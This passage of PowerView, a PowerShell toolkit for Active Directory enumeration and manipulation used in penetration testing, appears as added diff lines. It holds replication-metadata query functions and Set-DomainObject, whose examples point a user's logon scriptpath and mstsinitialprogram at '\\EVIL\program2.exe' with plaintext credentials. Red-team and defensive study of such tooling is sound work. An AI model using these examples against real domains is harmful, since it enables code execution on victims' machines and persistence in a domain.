'PowerView.ADObject.Raw') + } + else { + $Object = Convert-LDAPProperty -Properties $_.Properties + $Object.PSObject.TypeNames.Insert(0, 'PowerView.ADObject') + } + $Object + } + if ($Results) { + try { $Results.dispose() } + catch { + Write-Verbose "[Get-DomainObject] Error disposing of the Results object: $_" + } + } + $ObjectSearcher.dispose() + } + } +} + + +function Get-DomainObjectAttributeHistory { +<# +.SYNOPSIS + +Returns the Active Directory attribute replication metadata for the specified +object, i.e. a parsed version of the msds-replattributemetadata attribute. +By default, replication data for every domain object is returned. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +.DESCRIPTION + +Wraps Get-DomainObject with a specification to retrieve the property 'msds-replattributemetadata'. +This is the domain attribute replication metadata associated with the object. The results are +parsed from their XML string form and returned as a custom object. + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Only return replication metadata on the specified property names. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainObjectAttributeHistory -Domain testlab.local + +Return all attribute replication metadata for all objects in the testlab.local domain. + +.EXAMPLE + +'S-1-5-21-883232822-274137685-4173207997-1109','CN=dfm.a,CN=Users,DC=testlab,DC=local','da','94299db1-e3e7-48f9-845b-3bffef8bedbb' | Get-DomainObjectAttributeHistory -Properties objectClass | ft + +ObjectDN ObjectGuid AttributeNam LastOriginat Version LastOriginat + e ingChange ingDsaDN +-------- ---------- ------------ ------------ ------- ------------ +CN=dfm.a,C... a6263874-f... objectClass 2017-03-0... 1 CN=NTDS S... +CN=DA,CN=U... 77b56df4-f... objectClass 2017-04-1... 1 CN=NTDS S... +CN=harmj0y... 94299db1-e... objectClass 2017-03-0... 1 CN=NTDS S... + +.EXAMPLE + +Get-DomainObjectAttributeHistory harmj0y -Properties userAccountControl + +ObjectDN : CN=harmj0y,CN=Users,DC=testlab,DC=local +ObjectGuid : 94299db1-e3e7-48f9-845b-3bffef8bedbb +AttributeName : userAccountControl +LastOriginatingChange : 2017-03-07T19:56:27Z +Version : 4 +LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First + -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca + l + +.OUTPUTS + +PowerView.ADObjectAttributeHistory + +Custom PSObject with translated replication metadata fields. + +.LINK + +https://blogs.technet.microsoft.com/pie/2014/08/25/metadata-1-when-did-the-delegation-change-how-to-track-security-descriptor-modifications/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [OutputType('PowerView.ADObjectAttributeHistory')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + BEGIN { + $SearcherArguments = @{ + 'Properties' = 'msds-replattributemetadata','distinguishedname' + 'Raw' = $True + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['FindOne']) { $SearcherArguments['FindOne'] = $FindOne } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['Properties']) { + $PropertyFilter = $PSBoundParameters['Properties'] -Join '|' + } + else { + $PropertyFilter = '' + } + } + + PROCESS { + if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity } + + Get-DomainObject @SearcherArguments | ForEach-Object { + $ObjectDN = $_.Properties['distinguishedname'][0] + ForEach($XMLNode in $_.Properties['msds-replattributemetadata']) { + $TempObject = [xml]$XMLNode | Select-Object -ExpandProperty 'DS_REPL_ATTR_META_DATA' -ErrorAction SilentlyContinue + if ($TempObject) { + if ($TempObject.pszAttributeName -Match $PropertyFilter) { + $Output = New-Object PSObject + $Output | Add-Member NoteProperty 'ObjectDN' $ObjectDN + $Output | Add-Member NoteProperty 'AttributeName' $TempObject.pszAttributeName + $Output | Add-Member NoteProperty 'LastOriginatingChange' $TempObject.ftimeLastOriginatingChange + $Output | Add-Member NoteProperty 'Version' $TempObject.dwVersion + $Output | Add-Member NoteProperty 'LastOriginatingDsaDN' $TempObject.pszLastOriginatingDsaDN + $Output.PSObject.TypeNames.Insert(0, 'PowerView.ADObjectAttributeHistory') + $Output + } + } + else { + Write-Verbose "[Get-DomainObjectAttributeHistory] Error retrieving 'msds-replattributemetadata' for '$ObjectDN'" + } + } + } + } +} + + +function Get-DomainObjectLinkedAttributeHistory { +<# +.SYNOPSIS + +Returns the Active Directory links attribute value replication metadata for the +specified object, i.e. a parsed version of the msds-replvaluemetadata attribute. +By default, replication data for every domain object is returned. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +.DESCRIPTION + +Wraps Get-DomainObject with a specification to retrieve the property 'msds-replvaluemetadata'. +This is the domain linked attribute value replication metadata associated with the object. The +results are parsed from their XML string form and returned as a custom object. + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER Properties + +Only return replication metadata on the specified property names. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Get-DomainObjectLinkedAttributeHistory | Group-Object ObjectDN | ft -a + +Count Name +----- ---- + 4 CN=Administrators,CN=Builtin,DC=testlab,DC=local + 4 CN=Users,CN=Builtin,DC=testlab,DC=local + 2 CN=Guests,CN=Builtin,DC=testlab,DC=local + 1 CN=IIS_IUSRS,CN=Builtin,DC=testlab,DC=local + 1 CN=Schema Admins,CN=Users,DC=testlab,DC=local + 1 CN=Enterprise Admins,CN=Users,DC=testlab,DC=local + 4 CN=Domain Admins,CN=Users,DC=testlab,DC=local + 1 CN=Group Policy Creator Owners,CN=Users,DC=testlab,DC=local + 1 CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=testlab,DC=local + 1 CN=Windows Authorization Access Group,CN=Builtin,DC=testlab,DC=local + 8 CN=Denied RODC Password Replication Group,CN=Users,DC=testlab,DC=local + 2 CN=PRIMARY,CN=Topology,CN=Domain System Volume,CN=DFSR-GlobalSettings,... + 1 CN=Domain System Volume,CN=DFSR-LocalSettings,CN=PRIMARY,OU=Domain Con... + 1 CN=ServerAdmins,CN=Users,DC=testlab,DC=local + 3 CN=DomainLocalGroup,CN=Users,DC=testlab,DC=local + + +.EXAMPLE + +'S-1-5-21-883232822-274137685-4173207997-519','af94f49e-61a5-4f7d-a17c-d80fb16a5220' | Get-DomainObjectLinkedAttributeHistory + +ObjectDN : CN=Enterprise Admins,CN=Users,DC=testlab,DC=local +ObjectGuid : 94e782c1-16a1-400b-a7d0-1126038c6387 +AttributeName : member +AttributeValue : CN=Administrator,CN=Users,DC=testlab,DC=local +TimeDeleted : 2017-03-06T00:48:29Z +TimeCreated : 2017-03-06T00:48:29Z +LastOriginatingChange : 2017-03-06T00:48:29Z +Version : 1 +LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First + -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca + l + +ObjectDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local +ObjectGuid : af94f49e-61a5-4f7d-a17c-d80fb16a5220 +AttributeName : member +AttributeValue : CN=dfm,CN=Users,DC=testlab,DC=local +TimeDeleted : 2017-06-13T22:20:02Z +TimeCreated : 2017-06-13T22:20:02Z +LastOriginatingChange : 2017-06-13T22:20:22Z +Version : 2 +LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First + -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca + l + +ObjectDN : CN=Domain Admins,CN=Users,DC=testlab,DC=local +ObjectGuid : af94f49e-61a5-4f7d-a17c-d80fb16a5220 +AttributeName : member +AttributeValue : CN=Administrator,CN=Users,DC=testlab,DC=local +TimeDeleted : 2017-03-06T00:48:29Z +TimeCreated : 2017-03-06T00:48:29Z +LastOriginatingChange : 2017-03-06T00:48:29Z +Version : 1 +LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First + -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca + l + +.EXAMPLE + +Get-DomainObjectLinkedAttributeHistory ServerAdmins -Domain testlab.local + +ObjectDN : CN=ServerAdmins,CN=Users,DC=testlab,DC=local +ObjectGuid : 603b46ad-555c-49b3-8745-c0718febefc2 +AttributeName : member +AttributeValue : CN=jason.a,CN=Users,DC=dev,DC=testlab,DC=local +TimeDeleted : 2017-04-10T22:17:19Z +TimeCreated : 2017-04-10T22:17:19Z +LastOriginatingChange : 2017-04-10T22:17:19Z +Version : 1 +LastOriginatingDsaDN : CN=NTDS Settings,CN=PRIMARY,CN=Servers,CN=Default-First + -Site-Name,CN=Sites,CN=Configuration,DC=testlab,DC=loca + l + +.OUTPUTS + +PowerView.ADObjectLinkedAttributeHistory + +Custom PSObject with translated replication metadata fields. + +.LINK + +https://blogs.technet.microsoft.com/pie/2014/08/25/metadata-2-the-ephemeral-admin-or-how-to-track-the-group-membership/ +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [OutputType('PowerView.ADObjectLinkedAttributeHistory')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name', 'MemberDistinguishedName', 'MemberName')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [String[]] + $Properties, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty, + + [Switch] + $Raw + ) + + BEGIN { + $SearcherArguments = @{ + 'Properties' = 'msds-replvaluemetadata','distinguishedname' + 'Raw' = $True + } + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + + if ($PSBoundParameters['Properties']) { + $PropertyFilter = $PSBoundParameters['Properties'] -Join '|' + } + else { + $PropertyFilter = '' + } + } + + PROCESS { + if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity } + + Get-DomainObject @SearcherArguments | ForEach-Object { + $ObjectDN = $_.Properties['distinguishedname'][0] + ForEach($XMLNode in $_.Properties['msds-replvaluemetadata']) { + $TempObject = [xml]$XMLNode | Select-Object -ExpandProperty 'DS_REPL_VALUE_META_DATA' -ErrorAction SilentlyContinue + if ($TempObject) { + if ($TempObject.pszAttributeName -Match $PropertyFilter) { + $Output = New-Object PSObject + $Output | Add-Member NoteProperty 'ObjectDN' $ObjectDN + $Output | Add-Member NoteProperty 'AttributeName' $TempObject.pszAttributeName + $Output | Add-Member NoteProperty 'AttributeValue' $TempObject.pszObjectDn + $Output | Add-Member NoteProperty 'TimeCreated' $TempObject.ftimeCreated + $Output | Add-Member NoteProperty 'TimeDeleted' $TempObject.ftimeDeleted + $Output | Add-Member NoteProperty 'LastOriginatingChange' $TempObject.ftimeLastOriginatingChange + $Output | Add-Member NoteProperty 'Version' $TempObject.dwVersion + $Output | Add-Member NoteProperty 'LastOriginatingDsaDN' $TempObject.pszLastOriginatingDsaDN + $Output.PSObject.TypeNames.Insert(0, 'PowerView.ADObjectLinkedAttributeHistory') + $Output + } + } + else { + Write-Verbose "[Get-DomainObjectLinkedAttributeHistory] Error retrieving 'msds-replvaluemetadata' for '$ObjectDN'" + } + } + } + } +} + + +function Set-DomainObject { +<# +.SYNOPSIS + +Modifies a gven property for a specified active directory object. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +.DESCRIPTION + +Splats user/object targeting parameters to Get-DomainObject, returning the raw +searchresult object. Retrieves the raw directoryentry for the object, and sets +any values from -Set @{}, XORs any values from -XOR @{}, and clears any values +from -Clear @(). + +.PARAMETER Identity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. + +.PARAMETER Set + +Specifies values for one or more object properties (in the form of a hashtable) that will replace the current values. + +.PARAMETER XOR + +Specifies values for one or more object properties (in the form of a hashtable) that will XOR the current values. + +.PARAMETER Clear + +Specifies an array of object properties that will be cleared in the directory. + +.PARAMETER Domain + +Specifies the domain to use for the query, defaults to the current domain. + +.PARAMETER LDAPFilter + +Specifies an LDAP query string that is used to filter Active Directory objects. + +.PARAMETER SearchBase + +The LDAP source to search through, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.EXAMPLE + +Set-DomainObject testuser -Set @{'mstsinitialprogram'='\\EVIL\program.exe'} -Verbose + +VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser))) +VERBOSE: Setting mstsinitialprogram to \\EVIL\program.exe for object testuser + +.EXAMPLE + +"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Set @{'countrycode'=1234; 'mstsinitialprogram'='\\EVIL\program2.exe'} -Verbose + +VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: +(&(|(objectsid=S-1-5-21-890171859-3433809279-3366196753-1108))) +VERBOSE: Setting mstsinitialprogram to \\EVIL\program2.exe for object harmj0y +VERBOSE: Setting countrycode to 1234 for object harmj0y +VERBOSE: Get-DomainSearcher search string: +LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser))) +VERBOSE: Setting mstsinitialprogram to \\EVIL\program2.exe for object testuser +VERBOSE: Setting countrycode to 1234 for object testuser + +.EXAMPLE + +"S-1-5-21-890171859-3433809279-3366196753-1108","testuser" | Set-DomainObject -Clear department -Verbose + +Cleares the 'department' field for both object identities. + +.EXAMPLE + +Get-DomainUser testuser | ConvertFrom-UACValue -Verbose + +Name Value +---- ----- +NORMAL_ACCOUNT 512 + + +Set-DomainObject -Identity testuser -XOR @{useraccountcontrol=65536} -Verbose + +VERBOSE: Get-DomainSearcher search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: Get-DomainObject filter string: (&(|(samAccountName=testuser))) +VERBOSE: XORing 'useraccountcontrol' with '65536' for object 'testuser' + +Get-DomainUser testuser | ConvertFrom-UACValue -Verbose + +Name Value +---- ----- +NORMAL_ACCOUNT 512 +DONT_EXPIRE_PASSWORD 65536 + +.EXAMPLE + +Get-DomainUser -Identity testuser -Properties scriptpath + +scriptpath +---------- +\\primary\sysvol\blah.ps1 + +$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Set-DomainObject -Identity testuser -Set @{'scriptpath'='\\EVIL\program2.exe'} -Credential $Cred -Verbose +VERBOSE: [Get-Domain] Using alternate credentials for Get-Domain +VERBOSE: [Get-Domain] Extracted domain 'TESTLAB' from -Credential +VERBOSE: [Get-DomainSearcher] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: [Get-DomainSearcher] Using alternate credentials for LDAP connection +VERBOSE: [Get-DomainObject] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser)))) +VERBOSE: [Set-DomainObject] Setting 'scriptpath' to '\\EVIL\program2.exe' for object 'testuser' + +Get-DomainUser -Identity testuser -Properties scriptpath + +scriptpath +---------- +\\EVIL\program2.exe +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseShouldProcessForStateChangingFunctions', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [CmdletBinding()] + Param( + [Parameter(Position = 0, Mandatory = $True, ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [Alias('DistinguishedName', 'SamAccountName', 'Name')] + [String[]] + $Identity, + + [ValidateNotNullOrEmpty()] + [Alias('Replace')] + [Hashtable] + $Set, + + [ValidateNotNullOrEmpty()] + [Hashtable] + $XOR, + + [ValidateNotNullOrEmpty()] + [String[]] + $Clear, + + [ValidateNotNullOrEmpty()] + [String] + $Domain, + + [ValidateNotNullOrEmpty()] + [Alias('Filter')] + [String] + $LDAPFilter, + + [ValidateNotNullOrEmpty()] + [Alias('ADSPath')] + [String] + $SearchBase, + + [ValidateNotNullOrEmpty()] + [Alias('DomainController')] + [String] + $Server, + + [ValidateSet('Base', 'OneLevel', 'Subtree')] + [String] + $SearchScope = 'Subtree', + + [ValidateRange(1, 10000)] + [Int] + $ResultPageSize = 200, + + [ValidateRange(1, 10000)] + [Int] + $ServerTimeLimit, + + [Switch] + $Tombstone, + + [Management.Automation.PSCredential] + [Management.Automation.CredentialAttribute()] + $Credential = [Management.Automation.PSCredential]::Empty + ) + + BEGIN { + $SearcherArguments = @{'Raw' = $True} + if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain } + if ($PSBoundParameters['LDAPFilter']) { $SearcherArguments['LDAPFilter'] = $LDAPFilter } + if ($PSBoundParameters['SearchBase']) { $SearcherArguments['SearchBase'] = $SearchBase } + if ($PSBoundParameters['Server']) { $SearcherArguments['Server'] = $Server } + if ($PSBoundParameters['SearchScope']) { $SearcherArguments['SearchScope'] = $SearchScope } + if ($PSBoundParameters['ResultPageSize']) { $SearcherArguments['ResultPageSize'] = $ResultPageSize } + if ($PSBoundParameters['ServerTimeLimit']) { $SearcherArguments['ServerTimeLimit'] = $ServerTimeLimit } + if ($PSBoundParameters['Tombstone']) { $SearcherArguments['Tombstone'] = $Tombstone } + if ($PSBoundParameters['Credential']) { $SearcherArguments['Credential'] = $Credential } + } + + PROCESS { + if ($PSBoundParameters['Identity']) { $SearcherArguments['Identity'] = $Identity } + + # splat the appropriate arguments to Get-DomainObject + $RawObject = Get-DomainObject @SearcherArguments + + ForEach ($Object in $RawObject) { + + $Entry = $RawObject.GetDirectoryEntry() + + if($PSBoundParameters['Set']) { + try { + $PSBoundParameters['Set'].GetEnumerator() | ForEach-Object { + Write-Verbose "[Set-DomainObject] Setting '$($_.Name)' to '$($_.Value)' for object '$($RawObject.Properties.samaccountname)'" + $Entry.put($_.Name, $_.Value) + } + $Entry.commitchanges() + } + catch { + Write-Warning "[Set-DomainObject] Error setting/replacing properties for object '$($RawObject.Properties.samaccountname)' : $_" + } + } + if($PSBoundParameters['XOR']) { + try { + $PSBoundParameters['XOR'].GetEnumerator() | ForEach-Object { + $PropertyName = $_.Name + $PropertyXorValue = $_.Value + Write-Verbose "[Set-DomainObject] XORing '$PropertyName' with '$PropertyXorValue' for object '$($RawObject.Properties.samaccountname)'" + $TypeName = $Entry.$PropertyName[0].GetType().name + + # UAC value references- https://support.microsoft.com/en-us/kb/305144 + $PropertyValue = $($Entry.$PropertyName) -bxor $PropertyXorValue + $Entry.$PropertyName = $PropertyValue -as $TypeName + } + $Entry.commitchanges() + } + catch { + Write-Warning "[Set-DomainObject] Error XOR'ing properties for object '$($RawObject.Properties.samaccountname)' : $_" + } + } + if($PSBoundParameters['Clear']) { + try { + $PSBoundParameters['Clear'] | ForEach-Object { + $PropertyName = $_ + Write-Verbose "[Set-DomainObject] Clearing '$PropertyName' for object '$($RawObject.Properties.samaccountname)'" + $Entry.$PropertyName.clear() + } + $Entry.commitchanges() + } + catch { + Write-Warning "[Set-DomainObject] Error clearing properties for object '$($RawObject.Properties.samaccountname)' : $_" + } + } + } + } +} + + +function ConvertFrom-LDAPLogonHours { +<# +.SYNOPSIS + +Converts the LDAP LogonHours array to a processible object. + +Author: Lee Christensen (@tifkin_) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +Converts the LDAP LogonHours array to a processible object. Each entry +property in the output object corresponds to a day of the week and hour during +the day (in UTC) indicating whether or not the user can logon at the specified +hour. + +.PARAMETER LogonHoursArray + +21-byte LDAP hours array. + +.EXAMPLE + +$hours = (Get-DomainUser -LDAPFilter 'userworkstations=*')[0].logonhours +ConvertFrom-LDAPLogonHours $hours + +Gets the logonhours array from the first AD user with logon restrictions. + +.OUTPUTS + +PowerView.LogonHours +#> + + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')] + [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSShouldProcess', '')] + [OutputType('PowerView.LogonHours')] + [CmdletBinding()] + Param ( + [Parameter( ValueFromPipeline = $True, ValueFromPipelineByPropertyName = $True)] + [ValidateNotNullOrEmpty()] + [byte[]] + $LogonHoursArray + ) + + Begin { + if($LogonHoursArray.Count -ne 21) { + throw "LogonHoursArray is the incorrect length" + } + + function ConvertTo-LogonHoursArray { + Param ( + [int[]] + $HoursArr + ) + + $LogonHours = New-Object bool[] 24 + for($i=0; $i -lt 3; $i++) { + $Byte = $HoursArr[$i] + $Offset = $i * 8 + $Str = [Convert]::ToString($Byte,2).PadLeft(8,'0') + + $LogonHours[$Offset+0] = [bool] [convert]::ToInt32([string]$Str[7]) + $LogonHours[$Offset+1] = [bool] [convert]::ToInt32([string]$Str[6]) + $LogonHours[$Offset+2] = [bool] [convert]::ToInt32([string]$Str[5]) + $LogonHours[$Offset+3] = [bool] [convert]::ToInt32([string]$Str[4]) + $LogonHours[$Offset+4] = [bool] [convert]::ToInt32([string]$Str[3]) + $LogonHours[$Offset+5] = [bool] [convert]::ToInt32([string]$Str[2]) + $LogonHours[$Offset+6] = [bool] [convert]::ToInt32([string]$Str[1]) + $LogonHours[$Offset+7] = [bool] [convert]::ToInt32([string]$Str[0]) + } + + $LogonHours + } + } + + Process { + $Output = @{ + Sunday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[0..2] + Monday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[3..5] + Tuesday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[6..8] + Wednesday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[9..11] + Thurs = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[12..14] + Friday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[15..17] + Saturday = ConvertTo-LogonHoursArray -HoursArr $LogonHoursArray[18..20] + } + + $Output = New-Object PSObject -Property $Output + $Output.PSObject.TypeNames.Insert(0, 'PowerView.LogonHours') + $Output + } +} + + +function New-ADObjectAccessControlEntry { +<# +.SYNOPSIS + +Creates a new Active Directory object-specific access control entry. + +Author: Lee Christensen (@tifkin_) +License: BSD 3-Clause +Required Dependencies: None + +.DESCRIPTION + +Creates a new object-specific access control entry (ACE). The ACE could be +used for auditing access to an object or controlling access to objects. + +.PARAMETER PrincipalIdentity + +A SamAccountName (e.g. harmj0y), DistinguishedName (e.g. CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. 4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the domain principal to add for the ACL. Required. Wildcards accepted. + +.PARAMETER PrincipalDomain + +Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain. + +.PARAMETER PrincipalSearchBase + +The LDAP source to search through for principals, e.g. "LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +.PARAMETER Server + +Specifies an Active Directory server (domain controller) to bind to. + +.PARAMETER SearchScope + +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +.PARAMETER ResultPageSize + +Specifies the PageSize to set for the LDAP searcher object. + +.PARAMETER ServerTimeLimit + +Specifies the maximum amount of time the server spends searching. Default of 120 seconds. + +.PARAMETER Tombstone + +Switch. Specifies that the searcher should also return deleted/tombstoned objects. + +.PARAMETER Credential + +A [Management.Automation.PSCredential] object of alternate credentials +for connection to the target domain. + +.PARAMETER Right + +Specifies the rights set on the Active Directory object. + +.PARAMETER AccessControlType + +Specifies the type of ACE (allow or deny) + +.PARAMETER AuditFlag + +For audit ACEs, specifies when to create an audit log (on success or failure) + +.PARAMETER ObjectType + +Specifies the GUID of the object that the ACE applies to. + +.PARAMETER InheritanceType + +Specifies how the ACE applies to the object and/or its children. + +.PARAMETER InheritedObjectType + +Specifies the type of object that can inherit the ACE. + +.EXAMPLE + +$Guids = Get-DomainGUIDMap +$AdmPropertyGuid = $Guids.GetEnumerator() | 